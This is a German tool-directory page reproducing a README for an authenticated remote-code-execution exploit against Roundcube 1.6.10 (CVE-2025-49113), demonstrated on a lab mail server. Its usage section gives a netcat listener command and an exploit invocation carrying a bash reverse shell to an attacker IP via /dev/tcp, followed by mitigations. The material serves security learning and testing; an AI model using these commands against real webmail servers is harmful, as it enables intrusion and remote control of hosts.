Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49113-Roundcube_1.6.10 — Authentifizierter Remote-Code-Ausführung-Exploit für Roundcube 1.6.10 (CVE-2025-49113). Liefert eine Reverse Shell über einen manipulierten PHP-Payload durch die Webmail-Oberfläche. | Kitploit
Tools/GitHubGitHub/cyberquestor-infosec/cve-2025-49113-roundcube_1.6.10
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubcyberquestor-infosec/cve-2025-49113-roundcube_1.6.10

CVE-2025-49113-Roundcube_1.6.10

Authentifizierter Remote-Code-Ausführung-Exploit für Roundcube 1.6.10 (CVE-2025-49113). Liefert eine Reverse Shell über einen manipulierten PHP-Payload durch die Webmail-Oberfläche.

Repository anzeigen
43vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-49113 – Roundcube 1.6.10 Authentifizierte Remote-Code-Ausführung

⚠️ Haftungsausschluss
Dieses Repository ist ausschließlich für Bildungs- und Forschungszwecke bestimmt.
Alle Demonstrationen wurden in einer kontrollierten Laborumgebung durchgeführt.
Das unbefugte Testen oder Ausnutzen von Systemen ohne ausdrückliche Erlaubnis ist illegal und unethisch. Der Autor übernimmt keine Verantwortung für jeglichen Missbrauch dieser Informationen.


📌 Was ist Roundcube?

Roundcube ist ein weit verbreiteter, browserbasierter IMAP-E-Mail-Client, der in PHP geschrieben ist. Er bietet eine benutzerfreundliche Oberfläche für den Webmail-Zugriff und wird häufig von Hosting-Anbietern, akademischen Einrichtungen und internen Unternehmens-Mail-Servern eingesetzt.


🚨 Über die Schwachstelle

CVE-2025-49113 ist eine Schwachstelle, die Roundcube Version 1.6.10 betrifft und es einem authentifizierten Benutzer ermöglicht, eine Remote-Code-Ausführung (RCE) zu erreichen, indem er einen manipulierten Befehl über die Webmail-Oberfläche sendet.

Eine erfolgreiche Ausnutzung erfordert gültige Benutzeranmeldedaten. Einmal ausgenutzt, gewährt sie eine systemweite Befehlsausführung im Kontext des Webservers.

  • CVE-ID: CVE-2025-49113
  • Betroffene Anwendung: Roundcube 1.6.10
  • Schwachstellentyp: Authentifizierte Remote-Code-Ausführung
  • : Reverse Shell via PHP-Payload
Exploit-Typ
  • Exploit-Verfügbarkeit: Öffentlicher GitHub PoC

  • ⚙️ Laboraufbau

    • Target URL: http://mail.outbound.htb
    • Roundcube Version: 1.6.10
    • Listener: Netcat auf Port 4444
    • Exploit: CVE-2025-49113.php

    🚀 Exploit-Nutzung

    1. Netcat-Listener starten

    root@kitploit:~
    nc -nlvp 4444
    

    2. Den Exploit ausführen

    root@kitploit:~
    php CVE-2025-49113.php {url} {username} {password} "bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'"
    

    🔧 Ersetzen Sie <YOUR-IP> durch die IP Ihres Angreifers.


    📸 Demonstration

    Ausgabe des Exploit-Skripts

    Exploit-Skript wird ausgeführt

    Reverse Shell erfasst

    Reverse Shell-Listener


    🔐 Gegenmaßnahmen

    • Aktualisieren Sie Roundcube auf die neueste stabile und sichere Version.
    • Entfernen oder beschränken Sie den Benutzerzugriff auf anfällige Komponenten.
    • Setzen Sie strenge Zugriffskontrollen und IP-Whitelisting für Webmail-Oberflächen durch.
    • Überwachen Sie Authentifizierungsprotokolle auf Anomalien.
    • Wenden Sie das Prinzip der geringsten Privilegien auf Webserver-Umgebungen an.

    📝 Hinweise

    • Exploit erfordert Authentifizierung.
    • Nur gegen Roundcube 1.6.10 getestet.
    • Der Benutzerkontext der Shell hängt von der Serverkonfiguration ab.
    • Demonstration in einer virtuellen Laborumgebung durchgeführt.

    📚 Referenzen

    • OffSec Blog Post
    • Public Exploit

    📝 Medium-Blog

    Schauen Sie sich die ausführliche Schritt-für-Schritt-Anleitung und Theorie in meinem Medium-Beitrag an:
    👉 Blog auf Medium lesen

    Tool herunterladen